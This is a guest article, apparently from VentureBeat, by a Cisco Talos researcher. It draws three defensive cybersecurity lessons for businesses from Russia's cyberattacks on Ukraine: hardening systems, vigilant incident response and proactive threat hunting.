Russia’s War on Ukraine: 3 Cybersecurity Takeaways for Businesses
Check out the on-demand sessions from the Low-Code/No-Code Summit to learn how to successfully innovate and gain efficiencies by improving and scaling citizen developers. look now.
Offensive cyber actions are an integral part of modern armed conflicts. The Russian invasion of Ukraine was no exception.
Russia had already shown that it could harm the fledgling democracy through cyber warfare. Since at least 2013, alleged Russian attacks on Ukraine have included attacks on critical national infrastructure. For example, the destructive worm NotPetya from 2017, which remains Ukraine’s most destructive cyberattack.
Since the invasion, there has been a continuous onslaught of attacks on both the public and private sectors – but organizations have largely been successful in repelling them. This demonstrates that with proper planning, preparation, and resources, attacks from even the most sophisticated and persistent attackers can be defeated.
Cisco is proud to support the people of Ukraine, both through humanitarian assistance and securing systems. Working with Ukrainian authorities, we have been providing intelligence and resources to help defeat cyberattacks against the country for over six years. Since the invasion, Talos has formed a Security Operations Center (SOC) to aggressively hunt threats affecting Ukraine. He also directly advocates for more than 30 Ukrainian critical infrastructure and government organizations.
Developed from our experiences, we have three tips to help organizations defend themselves:
Customize security and defenses against threats and attacks
Proactive defense tailored to your environment makes attacks harder to carry out and easier to detect.
Delete network connections, services, applications, and systems that are no longer needed. Keep only those that are essential to the business. If your company has many apps that offer similar functionality, agree on one and delete the others. If certain apps are needed but rarely used, limit access to those who use them.
Similarly, limit access to sensitive data only to those who really need it. Many functions can be better served by having restricted access to subsets or aggregates of data rather than full access to everything.
Defend your crown jewels
Know where your most valuable data and system resides. These are the systems that would cause the most damage to your organizations if compromised or unavailable. Ensure that access is restricted to these systems and that appropriate protection is in place to mitigate threats. Above all, ensure that critical data is not only regularly backed up, but that teams are able to restore the data in the event of damage.
Like any criminal activity, cyberattacks leave evidence at the scene of the crime. Even the most sophisticated attackers leave traces that can be discovered and may choose to use mundane tools to perpetrate their activity.
Don’t overlook or downplay the discovery of a relatively common or unsophisticated malicious tool or dual-purpose software. Attackers frequently gain a foothold in an organization using basic tools before turning to more sophisticated techniques.
If evidence of a breach is detected, trigger the incident response process to quickly remediate the incursion. Identify the systems the attacker was able to access, where the attacker was able to persist, and most importantly, how the attacker was able to penetrate defenses. Correct any shortcomings before the attacker learns and improves his actions.
Remember that no one can monitor all systems all the time. Prioritize monitoring your most valuable data and systems so that any deviations from normal behavior can be quickly identified and investigated. Regularly drill and rehearse the response to potential incidents so that teams are well aware of the steps required and the different teams they need to coordinate with in the event of a real incident.
Incursion traces will be found in the system and network logs. Aggregating these logs so they can be queried allows teams to actively search for signs of compromise. This allows attacks to be identified early before the attacker has had a chance to achieve their objectives or cause damage.
Use threat intelligence to improve security
Pay attention to reports on how attackers have carried out attacks. Consider how malicious techniques and procedures used in previous attacks can be discovered in your system and network logs. Actively search for this evidence of a possible incursion.
Track and investigate abnormal behavior. Look for systems that behave differently from others. In most cases, there will be an innocent explanation, but sooner or later you will discover something that needs to be rectified.
Think like an attacker
No one knows your systems and networks better than the people who maintain and operate them. Engage operations teams in threat hunting, asking them about potential weaknesses or how users have circumvented restrictions. Use their knowledge to improve defenses and concoct new threat-hunting strategies.
Typically, attackers seek to do the bare minimum to achieve their goal. If an attacker finds that their attempts to breach your organization fail or they are quickly detected, they will be tempted to move on to an easier target.
A model of security resilience in the face of threats
Passive defense is not enough to combat the complexity, sophistication and persistence of today’s security threats. The security team should proactively search for hidden threats, even with security systems in place.
Remember that cybersecurity relies on the dedication and skill of security professionals. Invest in the training and well-being of your teams. Defending against attacks is a 24/7 activity, but defenders are human and need ample downtime to rest and recover in order to have the mental agility to spot sophisticated forays.
Ukraine weathered the storm of Russian cyberaggression because defenders prepared well, actively hunted attacks, and learned from previous incidents how to improve their security posture and hunting techniques.
These learnings provide a useful model that your business can apply to increase its security resilience:
- Custom defenses: Harden systems and identify key systems.
- Active vigilance: Respond to all incidents, even minor ones.
- Proactively hunt: look for evidence of incursion.
Cyberattacks are carried out by criminals who have a clear idea of what they want to accomplish. Preventing and detecting attacks is not a risky activity to be undertaken lightly. With the right focus and resources, even the most sophisticated and persistent attacks can be defeated.
Martin Lee is technical lead for security research at Talos, Cisco’s threat intelligence and research organization..
Welcome to the VentureBeat community!
DataDecisionMakers is where experts, including data technicians, can share data insights and innovations.
If you want to learn more about cutting-edge insights and up-to-date information, best practices, and the future of data and data technology, join us at DataDecisionMakers.
You might even consider writing your own article!
Learn more about DataDecisionMakers